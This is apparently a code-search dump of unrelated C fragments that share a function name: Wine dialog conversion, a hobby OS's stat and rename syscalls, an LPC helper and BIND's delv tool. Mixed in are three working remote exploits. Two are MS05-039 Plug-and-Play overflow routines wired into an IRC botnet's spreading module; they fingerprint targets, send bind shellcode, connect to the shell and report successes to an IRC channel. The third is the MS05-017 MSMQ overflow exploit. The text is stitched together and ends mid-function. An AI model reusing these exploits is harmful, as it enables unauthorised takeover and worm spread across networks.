            put_byte( &dialog16, get_word( &dialog32 ) );
            break;
        default:      /* class name string */
            WideCharToMultiByte( CP_ACP, 0, (LPWSTR)dialog32, -1, (LPSTR)dialog16, 0x7fffffff, NULL, NULL );
            dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
            dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;
            break;
        }

        /* Transfer window name */
        convert_name( &dialog16, &dialog32 );

        /* Transfer data: the length prefix is a WORD for DIALOGEX and a BYTE
         * otherwise.  For a standard dialog, creation data longer than 255
         * bytes gets a truncated prefix but is still copied in full below. */
        data = get_word( &dialog32 );
        if (dialogEx)
            put_word(&dialog16, data);
        else
            put_byte(&dialog16,(BYTE)data);

        if (data)
        {
            memcpy( dialog16, dialog32, data );
            dialog16 = (BYTE *)dialog16 + data;
            dialog32 = (BYTE *)dialog32 + data;
        }
        /* Next item */
        nbItems--;
    }
}
int syscall_stat(const char *file_name, struct stat *buf) { int drive; int curdir_handle; char name_comp[13], conv_name[11], dir_path[501]; struct dir_entry dent; int err, count; struct date_time dt; int clno; if (strlen(file_name) > 500) return ELONGPATH; parse_path(file_name, &drive, dir_path, name_comp); if (dir_path[0] != 0) { curdir_handle = open_path(drive, dir_path); if (curdir_handle < 0) { return curdir_handle; // Error } } else { curdir_handle = get_curdir_handle(drive); increment_ref_count(curdir_handle); } // Last file name component. if (convert_name(name_comp, conv_name) < 0) { err = EINVALIDNAME; // Error } else if (find_entry(curdir_handle, conv_name, &dent) == 1) { // Fill up the stat buf buf->st_dev = drive; buf->st_ino = 0; buf->st_mode = dent.attrib; buf->st_nlink = 1; buf->st_uid = buf->st_gid = 0; buf->st_rdev = 0; buf->st_size = dent.fsize; buf->st_blksize = 512; // Find time in seconds dt.seconds = (dent.time & 0x1f) * 2; dt.minutes = ((dent.time & 0x7e0) >> 5); dt.hours = (((unsigned short int)(dent.time & 0xf800)) >> 11); dt.date = dent.date & 0x1f; dt.month = ((dent.date & 0x1e0) >> 5); dt.year = (((unsigned short int)(dent.date & 0xfe00)) >> 9); buf->st_atime = buf->st_mtime = buf->st_ctime = date_to_secs(dt); // Find number of blocks count = 0; clno = dent.start_cluster; while (clno < 0xff8) { count++; clno = next_cluster_12(clno); } buf->st_blocks = count; err = 0; }
BOOL pnp(EXINFO exinfo) { struct sockaddr_in addr; struct hostent *he; int len; int sockfd; unsigned short smblen; unsigned short bindport; unsigned char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; char buffer[IRCLINE]; #ifdef _WIN32 WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); #endif // printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n"); // printf("\t Universal Exploit + no crash shellcode\n\n\n"); // printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n"); // if (exinfo.ip < 3) { // printf("%s <host> <bind port>\n", argv[0]); // exit(0); // return false; // } if ((he = gethostbyname(exinfo.ip)) == NULL) { // printf("[-] Unable to resolve %s\n", argv[1]); // exit(0); return false; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { // printf("[-] socket failed\n"); // exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(445); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); //printf("\n[*] connecting to %s:445...", argv[1]); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { //printf("\n[-] connect failed\n"); //exit(0); return false; } // printf("ok\n"); // printf("[*] null session..."); if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { // printf("\n[-] send failed\n"); // exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); // exit(0); return false; } if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { // printf("\n[-] send failed\n"); // exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 10) { // printf("\n[-] failed\n"); // exit(0); return false; } if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { // printf("\n[-] send failed\n"); // exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { 
//printf("\n[-] failed\n"); // exit(0); return false; } ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf((char*)tmp,"\\\\%s\\IPC$",exinfo.ip); convert_name((char*)ptr, (char*)tmp); smblen = strlen((char*)tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (send(sockfd, (char*)packet, ptr-packet, 0) < 0) { // printf("\n[-] send failed\n"); // _snprintf(buffer, sizeof(buffer), "send failed"); // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); //_snprintf(buffer, sizeof(buffer), "failed"); // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); // exit(0); return false; } //printf("ok\n"); // printf("[*] bind pipe..."); // _snprintf(buffer, sizeof(buffer), "Bind Pipe"); //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { //printf("\n[-] send failed\n"); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); // exit(0); } if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { // printf("\n[-] send failed\n"); //_snprintf(buffer, sizeof(buffer), "send failed"); //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); //exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); // exit(0); return false; } //printf("ok\n"); // printf("[*] sending crafted packet..."); // _snprintf(buffer, sizeof(buffer), "sending craffted packet"); // irc_privmsg(exinfo.sock, exinfo.chan, buffer, 
exinfo.notice); // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode bindport = xport; bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (send(sockfd, (char*)packet, 2196, 0) < 0) { // printf("\n[-] send failed\n"); //_snprintf(buffer, sizeof(buffer), "send failed"); //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); //exit(0); return false; } // printf("ok\n"); // printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2])); // _snprintf(buffer, sizeof(buffer), "Exploiting IP:%s",exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); // recv(sockfd, recvbuf, 4096, 0); exploit[exinfo.exploit].stats++; if (ConnectShell2(exinfo)) return true; return false; }
// Map a player name to the path of that player's save file.  The name is
// normalised with convert_name() and the lookup delegated to the master
// object.  Raises an error when `who` is not a string.
string player_save_file(string who){
    string normalised;

    if( !stringp(who) ) error("Bad argument 1 to save_file().");
    normalised = convert_name(who);
    return master()->player_save_file(normalised);
}
int main (int argc, char **argv) { unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525"; unsigned char *packet = NULL; unsigned short bindport; unsigned long cnt; struct sockaddr_in addr; struct hostent *he; int len, cpkt = 1; int sockfd; char recvbuf[4096]; char *buff, *ptr; #ifdef _WIN32 WSADATA wsa; #endif printf("\n (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n"); printf("\t Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n"); if (argc < 5) { printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]); printf("\nMSMQ ports: 2103, 2105, 2107\n"); printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n"); exit(0); } #ifdef _WIN32 WSAStartup(MAKEWORD(2,0), &wsa); #endif if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); return 0; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("[-] create socket failed\n"); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons((short)atoi(argv[2])); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); printf("\n[*] Connecting to %s:%u ... 
", argv[1], atoi(argv[2])); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("\n[-] connect failed!\n"); exit(0); } printf("OK\n"); packet = dce_rpc_bind(0, endp, 1, &cnt); if (send(sockfd, packet, cnt, 0) == -1) { printf("[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 0) { printf("[-] recv failed\n"); exit(0); } free(packet); printf("[*] Attacking..."); buff = (char *) malloc(4172); memset(buff, NOP, 4172); ptr = buff; memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1); ptr += sizeof(dce_rpc_header1)-1; // Remote NetBIOS name convert_name(ptr, argv[3]); ptr += strlen(argv[3])*2; memcpy(ptr, tag_private, sizeof(tag_private)-1); ptr += sizeof(tag_private)-1; memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1); // offsets ptr = buff; ptr += 438; memcpy(ptr, offsets, sizeof(offsets)-1); ptr += sizeof(offsets)-1; // shellcode bindport = (unsigned short)atoi(argv[4]); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); buff[4170] = '\0'; buff[4171] = '\0'; if (argc == 6) cpkt = atoi(argv[5]); while (cpkt--) { printf("."); if (send(sockfd, buff, 4172, 0) == -1) { printf("\n[-] send failed\n"); exit(0); } } printf(" OK\n"); return 0; }
/*
 * Load the DNSSEC trust anchors delv validates against into `client`.
 *
 * Does nothing when neither root nor DLV validation is enabled.  The key
 * file is `anchorfile` when given, else the system bind.keys (built from
 * NS_SYSCONFDIR, or from isc_ntpaths_get() on WIN32).  When no file could
 * be parsed and none was explicitly named, the compiled-in `anchortext`
 * is used instead.  Fatal on an explicitly named file that cannot be read
 * or parsed, and when no key ends up trusted.
 *
 * CHECK() is defined outside this listing; the `cleanup:` label implies it
 * stores into `result` and jumps there on failure -- confirm against the
 * macro.  `parser` is not destroyed in this function; presumably released
 * elsewhere or at exit -- confirm.
 */
static isc_result_t
setup_dnsseckeys(dns_client_t *client) {
	isc_result_t result;
	cfg_parser_t *parser = NULL;
	const cfg_obj_t *keys = NULL;
	const cfg_obj_t *managed_keys = NULL;
	cfg_obj_t *bindkeys = NULL;
	const char *filename = anchorfile;

	if (!root_validation && !dlv_validation)
		return (ISC_R_SUCCESS);

	if (filename == NULL) {
#ifndef WIN32
		filename = NS_SYSCONFDIR "/bind.keys";
#else
		static char buf[MAX_PATH];
		/* Both copies are bounded by sizeof(buf). */
		strlcpy(buf, isc_ntpaths_get(SYS_CONF_DIR), sizeof(buf));
		strlcat(buf, "\\bind.keys", sizeof(buf));
		filename = buf;
#endif
	}

	/* Default anchor name is the root zone. */
	if (trust_anchor == NULL) {
		trust_anchor = isc_mem_strdup(mctx, ".");
		if (trust_anchor == NULL)
			fatal("out of memory");
	}

	/* Always true after the block above (assigned, or fatal()). */
	if (trust_anchor != NULL)
		CHECK(convert_name(&afn, &anchor_name, trust_anchor));
	if (dlv_anchor != NULL)
		CHECK(convert_name(&dfn, &dlv_name, dlv_anchor));

	CHECK(cfg_parser_create(mctx, dns_lctx, &parser));

	/* An unreadable or unparsable *default* key file is not an error and
	 * is not logged: the built-in anchors below are used.  Only a file
	 * named with the anchorfile option is required to load. */
	if (access(filename, R_OK) != 0) {
		if (anchorfile != NULL)
			fatal("Unable to read key file '%s'", anchorfile);
	} else {
		result = cfg_parse_file(parser, filename,
					&cfg_type_bindkeys, &bindkeys);
		/* Two brace-less nested ifs; there is no else today, so no
		 * dangling-else ambiguity, but add braces before adding one. */
		if (result != ISC_R_SUCCESS)
			if (anchorfile != NULL)
				fatal("Unable to load keys from '%s'",
				      anchorfile);
	}

	if (bindkeys == NULL) {
		isc_buffer_t b;

		isc_buffer_init(&b, anchortext, sizeof(anchortext) - 1);
		isc_buffer_add(&b, sizeof(anchortext) - 1);
		result = cfg_parse_buffer(parser, &b, &cfg_type_bindkeys,
					  &bindkeys);
		if (result != ISC_R_SUCCESS)
			fatal("Unable to parse built-in keys");
	}

	INSIST(bindkeys != NULL);
	cfg_map_get(bindkeys, "trusted-keys", &keys);
	cfg_map_get(bindkeys, "managed-keys", &managed_keys);

	if (keys != NULL)
		CHECK(load_keys(keys, client));
	if (managed_keys != NULL)
		CHECK(load_keys(managed_keys, client));
	result = ISC_R_SUCCESS;

	/* trusted_keys is incremented by key_fromconfig() per anchor added. */
	if (trusted_keys == 0)
		fatal("No trusted keys were loaded");

	if (dlv_validation)
		dns_client_setdlv(client, dns_rdataclass_in, dlv_anchor);

 cleanup:
	if (result != ISC_R_SUCCESS)
		delv_log(ISC_LOG_ERROR, "setup_dnsseckeys: %s",
			 isc_result_totext(result));
	return (result);
}
/*
 * key_fromconfig - convert one "trusted-keys"/"managed-keys" tuple from the
 * parsed key file into DNSKEY rdata and install it as a trust anchor.
 *
 * key     the config tuple (name, flags, protocol, algorithm, key).
 * client  the resolver client that receives the anchor.
 *
 * Only keys whose owner name equals the configured root anchor
 * (anchor_name) or DLV anchor (dlv_name) are installed, and only for the
 * validation mode(s) that are enabled; any other key is ignored with
 * ISC_R_SUCCESS, so the key file may carry more anchors than are used.
 *
 * Returns ISC_R_SUCCESS on success and for a key with an unsupported
 * algorithm (logged as a warning and skipped); DST_R_NOCRYPTO is logged and
 * returned unchanged; every other failure is logged against the config
 * object and mapped to ISC_R_FAILURE.  CHECK() is assumed to assign result
 * and jump to cleanup.  Each installed key increments the global
 * trusted_keys counter that setup_dnsseckeys() tests afterwards.
 *
 * NOTE(review): apart from the width checks below, the DNSKEY flags are not
 * inspected, so the file is trusted to list only zone keys.
 */
static isc_result_t
key_fromconfig(const cfg_obj_t *key, dns_client_t *client) {
	dns_rdata_dnskey_t keystruct;
	isc_uint32_t flags, proto, alg;
	const char *keystr, *keynamestr;
	unsigned char keydata[4096];
	isc_buffer_t keydatabuf;
	unsigned char rrdata[4096];
	isc_buffer_t rrdatabuf;
	isc_region_t r;
	dns_fixedname_t fkeyname;
	dns_name_t *keyname;
	isc_result_t result;
	isc_boolean_t match_root = ISC_FALSE, match_dlv = ISC_FALSE;

	keynamestr = cfg_obj_asstring(cfg_tuple_get(key, "name"));
	CHECK(convert_name(&fkeyname, &keyname, keynamestr));

	if (!root_validation && !dlv_validation)
		return (ISC_R_SUCCESS);

	/* Match the key's owner name against the configured anchors. */
	if (anchor_name)
		match_root = dns_name_equal(keyname, anchor_name);
	if (dlv_name)
		match_dlv = dns_name_equal(keyname, dlv_name);

	if (!match_root && !match_dlv)
		return (ISC_R_SUCCESS);
	/* A matching anchor for a validation mode that is switched off is skipped. */
	if ((!root_validation && match_root) || (!dlv_validation && match_dlv))
		return (ISC_R_SUCCESS);

	if (match_root)
		delv_log(ISC_LOG_DEBUG(3), "adding trust anchor %s", trust_anchor);
	if (match_dlv)
		delv_log(ISC_LOG_DEBUG(3), "adding DLV trust anchor %s", dlv_anchor);

	flags = cfg_obj_asuint32(cfg_tuple_get(key, "flags"));
	proto = cfg_obj_asuint32(cfg_tuple_get(key, "protocol"));
	alg = cfg_obj_asuint32(cfg_tuple_get(key, "algorithm"));

	keystruct.common.rdclass = dns_rdataclass_in;
	keystruct.common.rdtype = dns_rdatatype_dnskey;
	/*
	 * The key data in keystruct is not dynamically allocated.
	 */
	keystruct.mctx = NULL;

	ISC_LINK_INIT(&keystruct.common, link);

	/* The struct fields are 16/8/8 bits wide; reject values that the
	 * narrowing casts below would silently truncate. */
	if (flags > 0xffff)
		CHECK(ISC_R_RANGE);
	if (proto > 0xff)
		CHECK(ISC_R_RANGE);
	if (alg > 0xff)
		CHECK(ISC_R_RANGE);

	keystruct.flags = (isc_uint16_t)flags;
	keystruct.protocol = (isc_uint8_t)proto;
	keystruct.algorithm = (isc_uint8_t)alg;

	isc_buffer_init(&keydatabuf, keydata, sizeof(keydata));
	isc_buffer_init(&rrdatabuf, rrdata, sizeof(rrdata));

	keystr = cfg_obj_asstring(cfg_tuple_get(key, "key"));
	/* Decoding is bounded by the 4096-byte keydata buffer; presumably a
	 * larger key fails inside the decoder and goes to cleanup via CHECK. */
	CHECK(isc_base64_decodestring(keystr, &keydatabuf));
	isc_buffer_usedregion(&keydatabuf, &r);
	keystruct.datalen = r.length;
	keystruct.data = r.base;

	CHECK(dns_rdata_fromstruct(NULL, keystruct.common.rdclass, keystruct.common.rdtype, &keystruct, &rrdatabuf));
	CHECK(dns_client_addtrustedkey(client, dns_rdataclass_in, keyname, &rrdatabuf));
	trusted_keys++;

 cleanup:
	if (result == DST_R_NOCRYPTO)
		cfg_obj_log(key, lctx, ISC_LOG_ERROR, "no crypto support");
	else if (result == DST_R_UNSUPPORTEDALG) {
		/* Not fatal: the remaining keys in the file can still be loaded. */
		cfg_obj_log(key, lctx, ISC_LOG_WARNING, "skipping trusted key '%s': %s", keynamestr, isc_result_totext(result));
		result = ISC_R_SUCCESS;
	} else if (result != ISC_R_SUCCESS) {
		cfg_obj_log(key, lctx, ISC_LOG_ERROR, "failed to add trusted key '%s': %s", keynamestr, isc_result_totext(result));
		result = ISC_R_FAILURE;
	}

	return (result);
}
/*
 * main - delv entry point: set up the ISC/DNS libraries, build a resolver
 * client, install trust anchors, resolve one name and print the answer.
 *
 * argc/argv are handed to preparse_args() and, after argv[0] is dropped,
 * to parse_args(), which fill the file-scope option variables used below
 * (qname, qtype, server, root_validation, dlv_validation, no_sigs, cdflag,
 * srcaddr4/6, anchor settings).
 *
 * Returns 0 unconditionally: a failed setup step (CHECK -> cleanup), a
 * failed resolution, or a print failure is only logged via delv_log() and
 * does not change the exit status.  Callers that script around this tool
 * cannot rely on the exit code to detect a validation or lookup failure;
 * fatal() is the only path that exits non-zero (its definition is not
 * visible here).  CHECK() is assumed to assign result and goto cleanup.
 */
int
main(int argc, char *argv[]) {
	dns_client_t *client = NULL;
	isc_result_t result;
	dns_fixedname_t qfn;
	dns_name_t *query_name, *response_name;
	dns_rdataset_t *rdataset;
	dns_namelist_t namelist;
	unsigned int resopt, clopt;
	isc_appctx_t *actx = NULL;
	isc_taskmgr_t *taskmgr = NULL;
	isc_socketmgr_t *socketmgr = NULL;
	isc_timermgr_t *timermgr = NULL;
	dns_master_style_t *style = NULL;
#ifndef WIN32
	struct sigaction sa;
#endif

	progname = argv[0];
	preparse_args(argc, argv);

	argc--;
	argv++;

	isc_lib_register();
	result = dns_lib_init();
	if (result != ISC_R_SUCCESS)
		fatal("dns_lib_init failed: %d", result);

	result = isc_mem_create(0, 0, &mctx);
	if (result != ISC_R_SUCCESS)
		fatal("failed to create mctx");

	/* Everything created from here on is released at cleanup, so the
	 * NULL initialisations above decide what gets destroyed. */
	CHECK(isc_appctx_create(mctx, &actx));
	CHECK(isc_taskmgr_createinctx(mctx, actx, 1, 0, &taskmgr));
	CHECK(isc_socketmgr_createinctx(mctx, actx, &socketmgr));
	CHECK(isc_timermgr_createinctx(mctx, actx, &timermgr));

	parse_args(argc, argv);

	CHECK(setup_style(&style));
	setup_logging(stderr);
	CHECK(isc_app_ctxstart(actx));

#ifndef WIN32
	/* Unblock SIGINT if it's been blocked by isc_app_ctxstart() */
	memset(&sa, 0, sizeof(sa));
	sa.sa_handler = SIG_DFL;
	if (sigfillset(&sa.sa_mask) != 0 || sigaction(SIGINT, &sa, NULL) < 0)
		fatal("Couldn't set up signal handler");
#endif

	/* Create client */
	clopt = DNS_CLIENTCREATEOPT_USECACHE;
	result = dns_client_createx2(mctx, actx, taskmgr, socketmgr, timermgr, clopt, &client, srcaddr4, srcaddr6);
	if (result != ISC_R_SUCCESS) {
		delv_log(ISC_LOG_ERROR, "dns_client_create: %s", isc_result_totext(result));
		goto cleanup;
	}

	/* Set the nameserver */
	if (server != NULL)
		addserver(client);
	else
		findserver(client);

	/* Trust anchors must be in place before the first query. */
	CHECK(setup_dnsseckeys(client));

	/* Construct QNAME */
	CHECK(convert_name(&qfn, &query_name, qname));

	/* Set up resolution options */
	resopt = DNS_CLIENTRESOPT_ALLOWRUN | DNS_CLIENTRESOPT_NOCDFLAG;
	if (no_sigs)
		resopt |= DNS_CLIENTRESOPT_NODNSSEC;
	/* With no anchor configured the answer is fetched but never validated. */
	if (!root_validation && !dlv_validation)
		resopt |= DNS_CLIENTRESOPT_NOVALIDATE;
	/* Clearing NOCDFLAG presumably sets CD (checking disabled) on the
	 * outgoing query so upstream validation is bypassed -- see the
	 * client library for the exact semantics. */
	if (cdflag)
		resopt &= ~DNS_CLIENTRESOPT_NOCDFLAG;

	/* Perform resolution */
	ISC_LIST_INIT(namelist);
	result = dns_client_resolve(client, query_name, dns_rdataclass_in, qtype, resopt, &namelist);
	if (result != ISC_R_SUCCESS)
		delv_log(ISC_LOG_ERROR, "resolution failed: %s", isc_result_totext(result));

	/* Whatever came back (possibly nothing) is printed name by name. */
	for (response_name = ISC_LIST_HEAD(namelist); response_name != NULL; response_name = ISC_LIST_NEXT(response_name, link)) {
		for (rdataset = ISC_LIST_HEAD(response_name->list); rdataset != NULL; rdataset = ISC_LIST_NEXT(rdataset, link)) {
			result = printdata(rdataset, response_name, style);
			if (result != ISC_R_SUCCESS)
				delv_log(ISC_LOG_ERROR, "print data failed");
		}
	}

	dns_client_freeresanswer(client, &namelist);

cleanup:
	/* Option strings owned by the argument parser are freed here too. */
	if (dlv_anchor != NULL)
		isc_mem_free(mctx, dlv_anchor);
	if (trust_anchor != NULL)
		isc_mem_free(mctx, trust_anchor);
	if (anchorfile != NULL)
		isc_mem_free(mctx, anchorfile);
	if (qname != NULL)
		isc_mem_free(mctx, qname);
	if (style != NULL)
		dns_master_styledestroy(&style, mctx);
	if (client != NULL)
		dns_client_destroy(&client);
	if (taskmgr != NULL)
		isc_taskmgr_destroy(&taskmgr);
	if (timermgr != NULL)
		isc_timermgr_destroy(&timermgr);
	if (socketmgr != NULL)
		isc_socketmgr_destroy(&socketmgr);
	if (actx != NULL)
		isc_appctx_destroy(&actx);
	if (lctx != NULL)
		isc_log_destroy(&lctx);
	isc_mem_detach(&mctx);
	dns_lib_shutdown();

	return (0);
}
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum ) { SOCKADDR_IN addr; int len; int sockfd; unsigned short smblen; char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; IRC* irc=(IRC*)conn; BOOL success=FALSE; char* thisTarget; int pnpbindsize=405; int TargetOS, Target; char* tOS=""; WSADATA wsa; fWSAStartup(MAKEWORD(2,0), &wsa); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; thisTarget = exinfo.ip; TargetOS=FpHost(thisTarget,FP_NP); if (TargetOS==OS_UNKNOWN) TargetOS=FpHost(thisTarget,FP_SMB); if (TargetOS == OS_WINNT){ Target=OS_WINNT; success=FALSE; }else if (TargetOS==OS_WINXP){ Target=OS_WINXP; success=FALSE; }else if (TargetOS==OS_WIN2K){ Target=OS_WIN2K; success=TRUE; }else{ success=FALSE; } ZeroMemory(&addr,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = finet_addr(thisTarget); addr.sin_port = fhtons((unsigned short)exinfo.port); if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE; if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if (len <= 10) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp,"\\\\%s\\IPC$",thisTarget); convert_name((char *)ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += 
sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // Start prepare header -- dETOX mod -- memcpy(RPC_call + 260, Offsets[OffNum], 4); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode unsigned short port; port = fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176],&port,2); memcpy(ptr,bindshell,pnpbindsize-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE; frecv(sockfd, recvbuf, 4096, 0); if (!exinfo.silent && exinfo.verbose){ switch(Target){ case 1: tOS="WINNT"; break; case 2: tOS="WIN2K"; break; case 3: tOS="WINXP"; break; default: tOS="UNKNOWN/2K3/LINUX"; break; } irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip); } // if(success){ Sleep(2000); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); // } return TRUE; }
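/*
 * syscall_rename - move/rename a file or directory within a single drive.
 *
 * a_oldpath  existing source path.
 * a_newpath  destination path.  One trailing '/' or '\\' on either path is
 *            stripped before parsing.
 *
 * Returns 0 on success, otherwise one of the filesystem error codes
 * (ELONGPATH, EINVALIDNAME, EDEVICE_DIFFERENT, ETARGET_EXISTS,
 * EPATH_NOT_EXISTS, EREADONLY, EOLDPATH_PARENT_OF_NEWPATH,
 * ESRC_DEST_NOT_SAME_TYPE), a negative open_path() result, or the non-1
 * value reported by add_dir_entry().
 *
 * An existing destination is replaced (rmdir/unlink) unless it is read-only
 * or a non-empty directory, and only when it has the same type (file vs.
 * directory) as the source.  A directory may not be moved underneath its
 * own parent chain.  Only directory entries are rewritten, never file data.
 *
 * Both parent directories are opened with open_path(); every exit path
 * must close_dir() whatever has been opened so far, so any new error
 * branch has to do the same.
 *
 * Fixes over the previous version: exist1/exist2 were read uninitialised
 * when a path had no final name component; a 512-character path passed the
 * "> 512" length test and overran the 512-byte local copies by one; an
 * empty path indexed oldpath[-1] while stripping the separator.
 */
int syscall_rename(const char *a_oldpath, const char *a_newpath)
{
	int ohandle, nhandle;
	int drive1, drive2;
	char dir_path1[512], dir_path2[512];
	char name_comp1[13], name_comp2[13], conv_name1[11], conv_name2[11];
	char oldpath[512], newpath[512];
	struct dir_entry dent1, dent2;
	/* Only assigned when the path has a final name component, but tested
	 * unconditionally below, so they must start out as "not found". */
	int exist1 = 0, exist2 = 0;
	struct DIR_FILE *dirf;
	size_t len1, len2;
	int i, t;

	len1 = strlen(a_oldpath);
	len2 = strlen(a_newpath);
	/* ">=" leaves room for the terminating NUL in the local copies. */
	if (len1 >= sizeof(oldpath) || len2 >= sizeof(newpath))
		return ELONGPATH;
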